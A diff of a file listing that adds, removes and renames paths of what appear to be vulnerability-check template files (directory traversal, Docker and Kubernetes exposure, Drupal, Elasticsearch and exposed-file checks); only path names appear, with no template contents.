./poc/directory_listing/kingdee-eas-directory-traversal-8489.yaml
-./poc/directory_listing/kingdee-eas-directory-traversal.yaml
./poc/directory_listing/kingdee-eas-directory-traversal.yml
./poc/directory_listing/natshell-path-traversal-9005.yaml
+./poc/directory_listing/natshell-path-traversal-9006.yaml
./poc/directory_listing/natshell-path-traversal-9007.yaml
./poc/directory_listing/natshell-path-traversal-9008.yaml
-./poc/directory_listing/natshell-path-traversal.yaml
./poc/directory_listing/netmizer-log-management-data-directory-traversal.yaml
./poc/directory_listing/nexusdb-cve-2020-24571-path-traversal.yml
./poc/directory_listing/nginx-merge-slashes-path-traversal-1.yaml
@@ -45236,8 +45213,6 @@
./poc/directory_listing/oa-tongda-path-traversal-9175.yaml
./poc/directory_listing/oa-tongda-path-traversal-9176.yaml
./poc/directory_listing/oa-tongda-path-traversal-9177.yaml
-./poc/directory_listing/oa-tongda-path-traversal-9178.yaml
-./poc/directory_listing/oa-tongda-path-traversal-9179.yaml
./poc/directory_listing/oa-tongda-path-traversal.yaml
./poc/directory_listing/path-traversal-exposure.yaml
./poc/directory_listing/path-traversal.yaml
@@ -45248,16 +45223,17 @@
./poc/directory_listing/pmb-directory-traversal-9612.yaml
./poc/directory_listing/pmb-directory-traversal-9613.yaml
./poc/directory_listing/pmb-directory-traversal-9614.yaml
+./poc/directory_listing/pmb-directory-traversal.yaml
+./poc/directory_listing/tpshop-directory-traversal-10821.yaml
./poc/directory_listing/tpshop-directory-traversal-10822.yaml
-./poc/directory_listing/tpshop-directory-traversal-10823.yaml
+./poc/directory_listing/tpshop-directory-traversal.yaml
./poc/directory_listing/tpshop-directory-traversal.yml
./poc/directory_listing/weiphp-path-traversal.yaml
./poc/directory_listing/weiphp-path-traversal.yml
./poc/directory_listing/wooyun-path-traversal-11229.yaml
+./poc/directory_listing/wooyun-path-traversal-11230.yaml
./poc/directory_listing/wooyun-path-traversal-11231.yaml
-./poc/directory_listing/wooyun-path-traversal-11232.yaml
./poc/directory_listing/wooyun-path-traversal-11233.yaml
-./poc/directory_listing/wooyun-path-traversal.yaml
./poc/directory_listing/wordpress-duplicator-path-traversal.yaml
./poc/directory_listing/wp-duplicator-path-traversal.yaml
./poc/directory_listing/yongyou-fe-templateoftaohong-manager-path-traversal.yaml
@@ -45266,12 +45242,10 @@
./poc/directory_listing/zeit-nodejs-cve-2020-5284-directory-traversal.yml
./poc/docker/Kubernetes-unauth.yaml
./poc/docker/amazon-docker-config-279.yaml
-./poc/docker/amazon-docker-config-280.yaml
-./poc/docker/amazon-docker-config-disclosure-278.yaml
./poc/docker/amazon-docker-config-disclosure.yaml
+./poc/docker/amazon-docker-config.yaml
./poc/docker/aws-ecs-container-agent-tasks-639.yaml
./poc/docker/aws-ecs-container-agent-tasks-640.yaml
-./poc/docker/aws-ecs-container-agent-tasks-641.yaml
./poc/docker/aws-ecs-container-agent-tasks.yaml
./poc/docker/container-registry-exposure.yaml
./poc/docker/docker-api-detection.yaml
@@ -45288,7 +45262,7 @@
./poc/docker/docker-compose-config-7.yaml
./poc/docker/docker-compose-config-7057.yaml
./poc/docker/docker-compose-config-7058.yaml
-./poc/docker/docker-compose-config-7059.yaml
+./poc/docker/docker-compose-config.yaml
./poc/docker/docker-compose-config.yml
./poc/docker/docker-compose.debug.yml
./poc/docker/docker-compose.yaml
@@ -45301,7 +45275,6 @@
./poc/docker/docker-registry-7065.yaml
./poc/docker/docker-registry-7066.yaml
./poc/docker/docker-registry-7067.yaml
-./poc/docker/docker-registry-7068.yaml
./poc/docker/docker-registry-api-unauth.yaml
./poc/docker/docker-registry-api-unauth.yml
./poc/docker/docker-registry.yaml
@@ -45310,13 +45283,12 @@
./poc/docker/dockercfg-config-1.yaml
./poc/docker/dockercfg-config-2.yaml
./poc/docker/dockercfg-config-7056.yaml
-./poc/docker/dockercfg-config.yaml
./poc/docker/dockercfg.yaml
./poc/docker/dockerfile-disclosure.yaml
./poc/docker/dockerfile-hidden-disclosure-1.yaml
./poc/docker/dockerfile-hidden-disclosure-2.yaml
+./poc/docker/dockerfile-hidden-disclosure-7061.yaml
./poc/docker/dockerfile-hidden-disclosure-7062.yaml
-./poc/docker/dockerfile-hidden-disclosure-7063.yaml
./poc/docker/dockerfile-hidden-disclosure.yaml
./poc/docker/dockerrun-aws-config-page.yaml
./poc/docker/dynamic-container-host.yaml
@@ -45330,18 +45302,16 @@
./poc/docker/kubernetes-dashboard-8526.yaml
./poc/docker/kubernetes-dashboard.yaml
./poc/docker/kubernetes-enterprise-manager-8527.yaml
-./poc/docker/kubernetes-enterprise-manager-8529.yaml
+./poc/docker/kubernetes-enterprise-manager-8528.yaml
./poc/docker/kubernetes-enterprise-manager-8530.yaml
./poc/docker/kubernetes-enterprise-manager.yaml
./poc/docker/kubernetes-etcd-keys.yaml
./poc/docker/kubernetes-fake-certificate.yaml
./poc/docker/kubernetes-kustomization-disclosure-8531.yaml
./poc/docker/kubernetes-kustomization-disclosure-8532.yaml
-./poc/docker/kubernetes-kustomization-disclosure.yaml
./poc/docker/kubernetes-metrics-8534.yaml
./poc/docker/kubernetes-metrics-8535.yaml
./poc/docker/kubernetes-metrics-8536.yaml
-./poc/docker/kubernetes-metrics.yaml
./poc/docker/kubernetes-mirantis-8537.yaml
./poc/docker/kubernetes-mirantis-8538.yaml
./poc/docker/kubernetes-mirantis-8539.yaml
@@ -45349,23 +45319,23 @@
./poc/docker/kubernetes-mirantis.yaml
./poc/docker/kubernetes-pods-1.yaml
./poc/docker/kubernetes-pods-2.yaml
-./poc/docker/kubernetes-pods-8543.yaml
+./poc/docker/kubernetes-pods-8542.yaml
./poc/docker/kubernetes-pods-8544.yaml
./poc/docker/kubernetes-pods-8546.yaml
./poc/docker/kubernetes-pods-api.yaml
./poc/docker/kubernetes-pods.yaml
./poc/docker/kubernetes-resource-report-8547.yaml
./poc/docker/kubernetes-resource-report-8548.yaml
-./poc/docker/kubernetes-unauth.yaml
+./poc/docker/kubernetes-unauth(1).yaml
./poc/docker/kubernetes-unauth.yml
./poc/docker/kubernetes-version-8550.yaml
./poc/docker/kubernetes-version-8551.yaml
+./poc/docker/kubernetes-version-8552.yaml
./poc/docker/kubernetes-version-8553.yaml
-./poc/docker/kubernetes-version.yaml
./poc/docker/kubernetes-web-view.yaml
./poc/docker/kubernetes.yaml
+./poc/docker/misconfigured-docker-8900.yaml
./poc/docker/misconfigured-docker-8901.yaml
-./poc/docker/misconfigured-docker-8902.yaml
./poc/docker/misconfigured-docker.yaml
./poc/docker/oracle-containers-panel.yaml
./poc/drupal/drupal-7-elfinder.yaml
@@ -45373,7 +45343,6 @@
./poc/drupal/drupal-cve-2018-7600-rce.yml
./poc/drupal/drupal-cve-2019-6340.yml
./poc/drupal/drupal-full-path-disclosure.yaml
-./poc/drupal/drupal-install-7105.yaml
./poc/drupal/drupal-install-7106.yaml
./poc/drupal/drupal-install-7108.yaml
./poc/drupal/drupal-install.yaml
@@ -45385,7 +45354,6 @@
./poc/drupal/drupal-user-enum-ajax-3.yaml
./poc/drupal/drupal-user-enum-ajax-4.yaml
./poc/drupal/drupal-user-enum-ajax-7109.yaml
-./poc/drupal/drupal-user-enum-ajax-7111.yaml
./poc/drupal/drupal-user-enum-ajax.yaml
./poc/drupal/drupal-user-enum-redirect-1.yaml
./poc/drupal/drupal-user-enum-redirect-2.yaml
@@ -45759,6 +45727,7 @@
./poc/elk/elasticsearch-insecure-default-config.yaml
./poc/elk/elasticsearch-log4j.yaml
./poc/elk/elasticsearch-sql-client-detect-7189.yaml
+./poc/elk/elasticsearch-sql-client-detect-7190.yaml
./poc/elk/elasticsearch-sql-client-detect-7191.yaml
./poc/elk/elasticsearch-sql-client-detect-7192.yaml
./poc/elk/elasticsearch-unauth.yaml
@@ -45776,9 +45745,9 @@
./poc/elk/kibana-detect-1.yaml
./poc/elk/kibana-detect-2.yaml
./poc/elk/kibana-detect-3.yaml
-./poc/elk/kibana-detect-8484.yaml
+./poc/elk/kibana-detect-8483.yaml
./poc/elk/kibana-detect.yaml
-./poc/elk/kibana-panel-8486.yaml
+./poc/elk/kibana-panel-8485.yaml
./poc/elk/kibana-panel-8487.yaml
./poc/elk/kibana-panel.yaml
./poc/elk/kibana-unauth.yaml
@@ -45821,20 +45790,18 @@
./poc/exposed/active-admin-exposure-39.yaml
./poc/exposed/active-admin-exposure-40.yaml
./poc/exposed/active-admin-exposure-41.yaml
-./poc/exposed/active-admin-exposure-42.yaml
+./poc/exposed/active-admin-exposure-43.yaml
./poc/exposed/active-admin-exposure.yaml
./poc/exposed/activemq-path-disclosure.yaml
-./poc/exposed/adobe-connect-username-exposure-100.yaml
./poc/exposed/adobe-connect-username-exposure-101.yaml
./poc/exposed/adobe-connect-username-exposure-98.yaml
./poc/exposed/adobe-connect-username-exposure-99.yaml
./poc/exposed/adobe-connect-username-exposure.yaml
./poc/exposed/airflow-api-exposure.yaml
./poc/exposed/airflow-configuration-exposure-229.yaml
-./poc/exposed/airflow-configuration-exposure.yaml
+./poc/exposed/airflow-configuration-exposure-230.yaml
./poc/exposed/airflow-exposure.yaml
./poc/exposed/allied-telesis-exposure.yaml
-./poc/exposed/amazon-docker-config-disclosure-278.yaml
./poc/exposed/amazon-docker-config-disclosure.yaml
./poc/exposed/amazon-sns-topic-disclosure-detect.yaml
./poc/exposed/ambari-exposure-291.yaml
@@ -45845,11 +45812,11 @@
./poc/exposed/ampache-update-exposure.yaml
./poc/exposed/android-debug-database-exposed-312.yaml
./poc/exposed/android-debug-database-exposed-313.yaml
+./poc/exposed/android-debug-database-exposed-314.yaml
./poc/exposed/android-debug-database-exposed-315.yaml
-./poc/exposed/android-debug-database-exposed-316.yaml
./poc/exposed/android-debug-database-exposed.yaml
./poc/exposed/ansible-config-disclosure-325.yaml
-./poc/exposed/ansible-config-disclosure.yaml
+./poc/exposed/ansible-config-disclosure-326.yaml
./poc/exposed/ansible-tower-exposure-329.yaml
./poc/exposed/ansible-tower-exposure-330.yaml
./poc/exposed/ansible-tower-exposure-332.yaml
@@ -45868,6 +45835,7 @@
./poc/exposed/appspec-yml-disclosure-2.yaml
./poc/exposed/appspec-yml-disclosure-527.yaml
./poc/exposed/appspec-yml-disclosure-528.yaml
+./poc/exposed/appspec-yml-disclosure-529.yaml
./poc/exposed/aspnetmvc-version-disclosure.yaml
./poc/exposed/atlassian-jira-info-disclosure.yaml
./poc/exposed/atom-sync-exposure.yaml
@@ -45878,8 +45846,8 @@
./poc/exposed/avtech-password-disclosure.yaml
./poc/exposed/axiom-digitalocean-key-exposure-665.yaml
./poc/exposed/axiom-digitalocean-key-exposure-666.yaml
-./poc/exposed/axiom-digitalocean-key-exposure-667.yaml
./poc/exposed/axiom-digitalocean-key-exposure-668.yaml
+./poc/exposed/axiom-digitalocean-key-exposure.yaml
./poc/exposed/azure-apim-secret-key-disclosure.yaml
./poc/exposed/azure-pipelines-config-disclosure.yaml
./poc/exposed/azure-pipelines-exposed.yaml
@@ -45887,6 +45855,7 @@
./poc/exposed/bash-history-exposure.yaml
./poc/exposed/beward-ipcamera-disclosure-713.yaml
./poc/exposed/beward-ipcamera-disclosure-714.yaml
+./poc/exposed/beward-ipcamera-disclosure-715.yaml
./poc/exposed/beward-ipcamera-disclosure-716.yaml
./poc/exposed/beward-ipcamera-disclosure-717.yaml
./poc/exposed/bitly-secret-key-disclosure.yaml
@@ -45895,20 +45864,22 @@
./poc/exposed/casbin-get-users-account-password-disclosure.yaml
./poc/exposed/caucho-resin-info-disclosure-1.yaml
./poc/exposed/caucho-resin-info-disclosure-2.yaml
+./poc/exposed/caucho-resin-info-disclosure-871.yaml
./poc/exposed/caucho-resin-info-disclosure-872.yaml
-./poc/exposed/caucho-resin-info-disclosure.yaml
+./poc/exposed/cisco-meraki-exposure-944.yaml
./poc/exposed/cisco-meraki-exposure-945.yaml
-./poc/exposed/cisco-meraki-exposure-946.yaml
./poc/exposed/cisco-meraki-exposure.yaml
./poc/exposed/cisco-smi-exposure-970.yaml
-./poc/exposed/cisco-smi-exposure-972.yaml
+./poc/exposed/cisco-smi-exposure-971.yaml
./poc/exposed/cisco-smi-exposure.yaml
./poc/exposed/clockwork-dashboard-exposure-1012.yaml
./poc/exposed/clockwork-dashboard-exposure-1013.yaml
+./poc/exposed/clockwork-dashboard-exposure-1015.yaml
./poc/exposed/clockwork-dashboard-exposure.yaml
./poc/exposed/cobbler-exposed-directories.yaml
./poc/exposed/commax-credentials-disclosure-1158.yaml
./poc/exposed/commax-credentials-disclosure-1159.yaml
+./poc/exposed/commax-credentials-disclosure-1160.yaml
./poc/exposed/comtrend-password-exposure-1166.yaml
./poc/exposed/comtrend-password-exposure-1167.yaml
./poc/exposed/container-registry-exposure.yaml
@@ -45917,7 +45888,7 @@
./poc/exposed/coremail-config-disclosure-1214.yaml
./poc/exposed/coremail-config-disclosure-1216.yaml
./poc/exposed/coremail-config-disclosure.yaml
-./poc/exposed/couchdb-exposure-1238.yaml
+./poc/exposed/couchdb-exposure-1239.yaml
./poc/exposed/couchdb-exposure-1240.yaml
./poc/exposed/couchdb-exposure-1241.yaml
./poc/exposed/couchdb-exposure.yaml
@@ -45929,11 +45900,13 @@
./poc/exposed/credentials-disclosure-1253.yaml
./poc/exposed/credentials-disclosure-1254.yaml
./poc/exposed/credentials-disclosure-1255.yaml
+./poc/exposed/credentials-disclosure-1256.yaml
./poc/exposed/credentials-disclosure-all.yaml
./poc/exposed/dahua-passowrd-disclosure.yaml
./poc/exposed/dashboard-exposed.yaml
./poc/exposed/database.json-exposure.yaml
./poc/exposed/dede-cms-radminpass-disclosure.yaml
+./poc/exposed/django-debug-exposed-404.yaml
./poc/exposed/django-debug-exposure-7028.yaml
./poc/exposed/django-debug-exposure-7029.yaml
./poc/exposed/django-debug-exposure-7030.yaml
@@ -45945,11 +45918,10 @@
./poc/exposed/dockerfile-disclosure.yaml
./poc/exposed/dockerfile-hidden-disclosure-1.yaml
./poc/exposed/dockerfile-hidden-disclosure-2.yaml
+./poc/exposed/dockerfile-hidden-disclosure-7061.yaml
./poc/exposed/dockerfile-hidden-disclosure-7062.yaml
-./poc/exposed/dockerfile-hidden-disclosure-7063.yaml
./poc/exposed/dockerfile-hidden-disclosure.yaml
./poc/exposed/doorgets-info-disclosure.yaml
-./poc/exposed/druid-console-exposure-7092.yaml
./poc/exposed/druid-console-exposure-7093.yaml
./poc/exposed/druid-console-exposure-7094.yaml
./poc/exposed/druid-console-exposure.yaml
@@ -45990,10 +45962,12 @@
./poc/exposed/exposed security questions.yaml
./poc/exposed/exposed-adb-7280.yaml
./poc/exposed/exposed-adb-7281.yaml
+./poc/exposed/exposed-adb-7282.yaml
./poc/exposed/exposed-adb.yaml
./poc/exposed/exposed-alps-spring-1.yaml
./poc/exposed/exposed-alps-spring-2.yaml
./poc/exposed/exposed-alps-spring-3.yaml
+./poc/exposed/exposed-alps-spring-7283.yaml
./poc/exposed/exposed-alps-spring-7284.yaml
./poc/exposed/exposed-alps-spring-7285.yaml
./poc/exposed/exposed-alps-spring.yaml
@@ -46005,17 +45979,19 @@
./poc/exposed/exposed-authentication.asmx.yaml
./poc/exposed/exposed-backup-files.yaml
./poc/exposed/exposed-bitkeeper-7290.yaml
+./poc/exposed/exposed-bitkeeper-7292.yaml
./poc/exposed/exposed-bitkeeper.yaml
./poc/exposed/exposed-bzr-7293.yaml
./poc/exposed/exposed-bzr-7295.yaml
./poc/exposed/exposed-bzr.yaml
./poc/exposed/exposed-darcs-7296.yaml
-./poc/exposed/exposed-darcs-7298.yaml
+./poc/exposed/exposed-darcs-7297.yaml
./poc/exposed/exposed-darcs.yaml
./poc/exposed/exposed-docker-api-1.yaml
./poc/exposed/exposed-docker-api-2.yaml
./poc/exposed/exposed-docker-api-7299.yaml
./poc/exposed/exposed-docker-api-7300.yaml
+./poc/exposed/exposed-docker-api-7301.yaml
./poc/exposed/exposed-dockerd.yaml
./poc/exposed/exposed-elasticsearch.yaml
./poc/exposed/exposed-env-js.yaml
@@ -46028,7 +46004,6 @@
./poc/exposed/exposed-gitignore-2.yaml
./poc/exposed/exposed-gitignore-3.yaml
./poc/exposed/exposed-gitignore-7302.yaml
-./poc/exposed/exposed-gitignore-7303.yaml
./poc/exposed/exposed-gitignore-7304.yaml
./poc/exposed/exposed-gitignore-7306.yaml
./poc/exposed/exposed-gitlab-ci-config.yaml
@@ -46040,15 +46015,16 @@
./poc/exposed/exposed-grafana.yaml
./poc/exposed/exposed-graphql.yaml
./poc/exposed/exposed-hg-7311.yaml
+./poc/exposed/exposed-hg-7312.yaml
./poc/exposed/exposed-hg.yaml
./poc/exposed/exposed-jenkins.yaml
./poc/exposed/exposed-jira.yaml
./poc/exposed/exposed-jquery-file-upload-7313.yaml
./poc/exposed/exposed-jquery-file-upload-7314.yaml
./poc/exposed/exposed-jquery-file-upload-7315.yaml
-./poc/exposed/exposed-jquery-file-upload.yaml
./poc/exposed/exposed-kafdrop-7316.yaml
./poc/exposed/exposed-kafdrop-7317.yaml
+./poc/exposed/exposed-kafdrop-7318.yaml
./poc/exposed/exposed-kafdrop.yaml
./poc/exposed/exposed-kibana-1.yaml
./poc/exposed/exposed-kibana-2.yaml
@@ -46063,9 +46039,7 @@
./poc/exposed/exposed-nomad-7325.yaml
./poc/exposed/exposed-nomad-7326.yaml
./poc/exposed/exposed-nomad-7327.yaml
-./poc/exposed/exposed-nomad-7328.yaml
./poc/exposed/exposed-nomad-7329.yaml
-./poc/exposed/exposed-nomad-7330.yaml
./poc/exposed/exposed-nomad.yaml
./poc/exposed/exposed-pagespeed-global-admin-7331.yaml
./poc/exposed/exposed-pagespeed-global-admin.yaml
@@ -46078,12 +46052,12 @@
./poc/exposed/exposed-redis-7336.yaml
./poc/exposed/exposed-redis-7337.yaml
./poc/exposed/exposed-redis-7338.yaml
+./poc/exposed/exposed-redis-7339.yaml
./poc/exposed/exposed-redis.yaml
./poc/exposed/exposed-service-now-7340.yaml
./poc/exposed/exposed-service-now-7341.yaml
./poc/exposed/exposed-service-now.yaml
./poc/exposed/exposed-sharepoint-list-7344.yaml
-./poc/exposed/exposed-sharepoint-list-7345.yaml
./poc/exposed/exposed-sharepoint-list-7346.yaml
./poc/exposed/exposed-sharepoint-list-7347.yaml
./poc/exposed/exposed-sonarqube.yaml
@@ -46093,6 +46067,7 @@
./poc/exposed/exposed-sqlite-manager-7350.yaml
./poc/exposed/exposed-sqlite-manager.yaml
./poc/exposed/exposed-struts.yaml
+./poc/exposed/exposed-svn-7351.yaml
./poc/exposed/exposed-svn-7352.yaml
./poc/exposed/exposed-svn-7353.yaml
./poc/exposed/exposed-svn-7354.yaml
@@ -46102,20 +46077,19 @@
./poc/exposed/exposed-symfony-profiler.yaml
./poc/exposed/exposed-user-info-error-messages (2).yaml
./poc/exposed/exposed-vscode-7356.yaml
-./poc/exposed/exposed-vscode-7357.yaml
+./poc/exposed/exposed-vscode.yaml
+./poc/exposed/exposed-webalizer-7358.yaml
./poc/exposed/exposed-webalizer-7359.yaml
-./poc/exposed/exposed-webalizer-7360.yaml
./poc/exposed/exposed-webalizer.yaml
./poc/exposed/exposed-zookeeper-7361.yaml
./poc/exposed/exposed-zookeeper-7362.yaml
./poc/exposed/exposed-zookeeper-7363.yaml
./poc/exposed/exposed-zookeeper-7364.yaml
-./poc/exposed/exposed-zookeeper-7365.yaml
./poc/exposed/exposed-zookeeper.yaml
./poc/exposed/fanruanoa2012-disclosure-1.yaml
./poc/exposed/fanruanoa2012-disclosure-2.yaml
+./poc/exposed/fanruanoa2012-disclosure-7389.yaml
./poc/exposed/fanruanoa2012-disclosure-7390.yaml
-./poc/exposed/fanruanoa2012-disclosure.yaml
./poc/exposed/fckeditor-exposed.yaml
./poc/exposed/file-manager-exposed.yaml
./poc/exposed/filezilla-exposed.yaml
@@ -46124,18 +46098,18 @@
./poc/exposed/firebase-config-exposure-7485.yaml
./poc/exposed/firebase-config-exposure-7486.yaml
./poc/exposed/firebase-config-exposure-7488.yaml
-./poc/exposed/firebase-config-exposure.yaml
./poc/exposed/firebase-messaging-sw-js-exposure.yaml
-./poc/exposed/flink-exposure-7509.yaml
./poc/exposed/flink-exposure-7510.yaml
+./poc/exposed/flink-exposure-7511.yaml
./poc/exposed/flink-exposure.yaml
./poc/exposed/ftp-credentials-exposure-7567.yaml
-./poc/exposed/ftp-credentials-exposure-7568.yaml
+./poc/exposed/ftp-credentials-exposure.yaml
./poc/exposed/get-case-insensitive.yaml
./poc/exposed/git-config-exposure.yaml
./poc/exposed/git-credentials-disclosure-7639.yaml
-./poc/exposed/git-credentials-disclosure-7640.yaml
+./poc/exposed/git-credentials-disclosure-7641.yaml
./poc/exposed/git-credentials-disclosure-7642.yaml
+./poc/exposed/git-credentials-disclosure.yaml
./poc/exposed/git-exposure.yaml
./poc/exposed/git-metadata-exposure.yaml
./poc/exposed/git-repo-disclosure.yaml
@@ -46158,8 +46132,8 @@
./poc/exposed/github-workflows-disclosure-5.yaml
./poc/exposed/github-workflows-disclosure-6.yaml
./poc/exposed/github-workflows-disclosure-7.yaml
+./poc/exposed/github-workflows-disclosure-7664.yaml
./poc/exposed/github-workflows-disclosure-7665.yaml
-./poc/exposed/github-workflows-disclosure-7666.yaml
./poc/exposed/github-workflows-disclosure-8.yaml
./poc/exposed/github-workflows-disclosure-9.yaml
./poc/exposed/github-workflows-disclosure.yaml
@@ -46170,10 +46144,10 @@
./poc/exposed/glpi-status-ldap-domain-disclosure-3.yaml
./poc/exposed/glpi-telemetry-disclosure-1.yaml
./poc/exposed/glpi-telemetry-disclosure-2.yaml
-./poc/exposed/glpi-telemetry-disclosure-7739.yaml
./poc/exposed/glpi-telemetry-disclosure.yaml
./poc/exposed/go-mod-disclosure.yaml
./poc/exposed/go-pprof-exposed.yaml
+./poc/exposed/gogs-install-exposure-7755.yaml
./poc/exposed/gogs-install-exposure-7757.yaml
./poc/exposed/gogs-install-exposure-7758.yaml
./poc/exposed/gogs-install-exposure.yaml
@@ -46195,8 +46169,8 @@
./poc/exposed/hidden-api-key-exposure.yaml
./poc/exposed/hikvision-env-disclosure.yaml
./poc/exposed/hp-ilo-serial-key-disclosure-8022.yaml
-./poc/exposed/hp-ilo-serial-key-disclosure-8023.yaml
./poc/exposed/hp-ilo-serial-key-disclosure-8024.yaml
+./poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml
./poc/exposed/hp-ilo-serial-key-disclosure.yaml
./poc/exposed/ibm-friendly-path-exposure-1.yaml
./poc/exposed/ibm-friendly-path-exposure-2.yaml
@@ -46239,13 +46213,14 @@
./poc/exposed/jenkins-exposed.yaml
./poc/exposed/jenkins-home-dir-exposure.yaml
./poc/exposed/jetty-information-disclosure.yaml
+./poc/exposed/jfrog-unauth-build-exposed-8299.yaml
./poc/exposed/jfrog-unauth-build-exposed-8300.yaml
./poc/exposed/jfrog-unauth-build-exposed-8301.yaml
./poc/exposed/jfrog-unauth-build-exposed-8302.yaml
./poc/exposed/jfrog-unauth-build-exposed.yaml
./poc/exposed/jiva-admin-exposure.yaml
./poc/exposed/jolokia-heap-info-disclosure-8357.yaml
-./poc/exposed/jolokia-info-disclosure-8358.yaml
+./poc/exposed/jolokia-info-disclosure-8359.yaml
./poc/exposed/jolokia-info-disclosure.yaml
./poc/exposed/joomla-sensitive-config.yaml
./poc/exposed/jupyter-notebooks-exposed.yaml
@@ -46255,7 +46230,6 @@
./poc/exposed/kronos-wsld-exposure.yaml
./poc/exposed/kubernetes-kustomization-disclosure-8531.yaml
./poc/exposed/kubernetes-kustomization-disclosure-8532.yaml
-./poc/exposed/kubernetes-kustomization-disclosure.yaml
./poc/exposed/kyan-credential-exposure-8554.yaml
./poc/exposed/kyan-credential-exposure.yaml
./poc/exposed/kyan-network-credentials-disclosure.yaml
@@ -46268,15 +46242,14 @@
./poc/exposed/locust-exposure.yaml
./poc/exposed/logstash-config-exposure.yml
./poc/exposed/lvmeng-uts-disclosure-8679.yaml
-./poc/exposed/lvmeng-uts-disclosure-8680.yaml
./poc/exposed/lvmeng-uts-disclosure-8681.yaml
./poc/exposed/lvmeng-uts-disclosure.yaml
./poc/exposed/magento-2-exposed-api-1.yaml
./poc/exposed/magento-2-exposed-api-2.yaml
./poc/exposed/magento-2-exposed-api-3.yaml
./poc/exposed/magento-2-exposed-api-8687.yaml
+./poc/exposed/magento-2-exposed-api-8688.yaml
./poc/exposed/magento-2-exposed-api-8689.yaml
-./poc/exposed/magento-config-disclosure.yaml
./poc/exposed/magento-information-disclosure.yaml
./poc/exposed/mapbox-token-disclosure.yaml
./poc/exposed/mobsf-framework-exposure.yaml
@@ -46292,6 +46265,7 @@
./poc/exposed/netgear-router-exposure-9029.yaml
./poc/exposed/netgear-router-exposure-9030.yaml
./poc/exposed/netgear-router-exposure-9031.yaml
+./poc/exposed/netgear-router-exposure.yaml
./poc/exposed/nexus-repo-config-exposure.yml
./poc/exposed/nexus-repository-exposed-configuration.yaml
./poc/exposed/nginx-conf-exposed.yaml
@@ -46310,7 +46284,6 @@
./poc/exposed/oracle-ebs-credentials-disclosure-9363.yaml
./poc/exposed/oracle-ebs-credentials-disclosure.yaml
./poc/exposed/oracle-ebs-sqllog-disclosure-9367.yaml
-./poc/exposed/oracle-ebs-sqllog-disclosure-9369.yaml
./poc/exposed/oracle-ebs-sqllog-disclosure-9370.yaml
./poc/exposed/oracle-ebs-sqllog-disclosure-9371.yaml
./poc/exposed/oracle-ebs-sqllog-disclosure-9372.yaml
@@ -46320,7 +46293,7 @@
./poc/exposed/path-traversal-exposure.yaml
./poc/exposed/pgadmin-exposure-9488.yaml
./poc/exposed/pgadmin-exposure-9489.yaml
-./poc/exposed/pgadmin-exposure-9490.yaml
+./poc/exposed/pgadmin-exposure-9491.yaml
./poc/exposed/pgadmin-exposure.yaml
./poc/exposed/php-debugbar-exposure.yaml
./poc/exposed/php-user-ini-disclosure-1.yaml
@@ -46336,12 +46309,12 @@
./poc/exposed/pmb-local-file-disclosure-9616.yaml
./poc/exposed/pmb-local-file-disclosure-9617.yaml
./poc/exposed/pmb-local-file-disclosure-9618.yaml
-./poc/exposed/pmb-local-file-disclosure-9620.yaml
+./poc/exposed/pmb-local-file-disclosure-9619.yaml
+./poc/exposed/pmb-local-file-disclosure.yaml
./poc/exposed/postman-api-key-disclosure.yaml
./poc/exposed/private-key-exposure-9654.yaml
./poc/exposed/prometheus-exposed-panel-9679.yaml
./poc/exposed/prometheus-exposed-panel-9680.yaml
-./poc/exposed/prometheus-exposed-panel-9681.yaml
./poc/exposed/prometheus-exposed-panel-9682.yaml
./poc/exposed/prometheus-exposed-panel-9683.yaml
./poc/exposed/prometheus-exposed-panel-9684.yaml
@@ -46349,22 +46322,24 @@
./poc/exposed/prometheus-pushgateway-exposed-panel.yaml
./poc/exposed/proton-recovery-phrase-disclosure.yaml
./poc/exposed/putty-private-key-disclosure-9729.yaml
+./poc/exposed/putty-private-key-disclosure-9730.yaml
./poc/exposed/putty-private-key-disclosure-9731.yaml
-./poc/exposed/putty-private-key-disclosure-9732.yaml
./poc/exposed/putty-private-key-disclosure.yaml
./poc/exposed/pyproject-disclosure-9735.yaml
./poc/exposed/pyproject-disclosure-9736.yaml
-./poc/exposed/pyproject-disclosure-9737.yaml
+./poc/exposed/pyproject-disclosure-9738.yaml
./poc/exposed/qianxin-tianqing-info-disclosure.yaml
./poc/exposed/qihang-media-disclosure-9762.yaml
./poc/exposed/qihang-media-disclosure-9763.yaml
+./poc/exposed/qihang-media-disclosure-9764.yaml
./poc/exposed/qihang-media-disclosure-9765.yaml
+./poc/exposed/qihang-media-disclosure.yaml
./poc/exposed/qvidium-management-system-exposed.yaml
./poc/exposed/qywechat-secret-disclosure.yaml
./poc/exposed/rabbitmq-config-exposure.yml
./poc/exposed/rails-routes-exposed.yaml
./poc/exposed/rails-secret-token-disclosure-9808.yaml
-./poc/exposed/rails-secret-token-disclosure-9809.yaml
+./poc/exposed/rails-secret-token-disclosure-9810.yaml
./poc/exposed/rails-secret-token-disclosure.yaml
./poc/exposed/razorpay-clientid-disclosure.yaml
./poc/exposed/redis-commander-exposure-9851.yaml
@@ -46376,11 +46351,12 @@
./poc/exposed/rocketmq-console-exposure.yaml
./poc/exposed/roundcube-log-disclosure-1.yaml
./poc/exposed/roundcube-log-disclosure-2.yaml
-./poc/exposed/roundcube-log-disclosure-9905.yaml
./poc/exposed/roundcube-log-disclosure-9906.yaml
+./poc/exposed/roundcube-log-disclosure-9907.yaml
./poc/exposed/roundcube-log-disclosure.yaml
./poc/exposed/ruby-on-rails-secret-token-disclosure.yaml
./poc/exposed/ruijie-information-disclosure-9930.yaml
+./poc/exposed/ruijie-information-disclosure-9931.yaml
./poc/exposed/ruijie-information-disclosure-9932.yaml
./poc/exposed/ruijie-nbr1300g-exposure-9935.yaml
./poc/exposed/ruijie-nbr1300g-exposure-9937.yaml
@@ -46394,7 +46370,7 @@
./poc/exposed/seeyon-a6-createmysql-disclosure.yaml
./poc/exposed/seeyon-a8-info-disclosure.yaml
./poc/exposed/seeyon-oa-session-information-disclosure.yaml
-./poc/exposed/selenium-exposure-10138.yaml
+./poc/exposed/selenium-exposure-10137.yaml
./poc/exposed/selenium-exposure.yaml
./poc/exposed/selenoid-ui-exposure-10139.yaml
./poc/exposed/selenoid-ui-exposure.yaml
@@ -46413,13 +46389,11 @@
./poc/exposed/sensitive-storage-exposure-4.yaml
./poc/exposed/sensitive-storage-exposure-5.yaml
./poc/exposed/sensitive-storage-exposure-6.yaml
-./poc/exposed/sensitive-storage-exposure.yaml
./poc/exposed/sensitives.yaml
./poc/exposed/server-config-exposure.yaml
./poc/exposed/service-now-exposed.yaml
./poc/exposed/setup-page-exposure-1.yaml
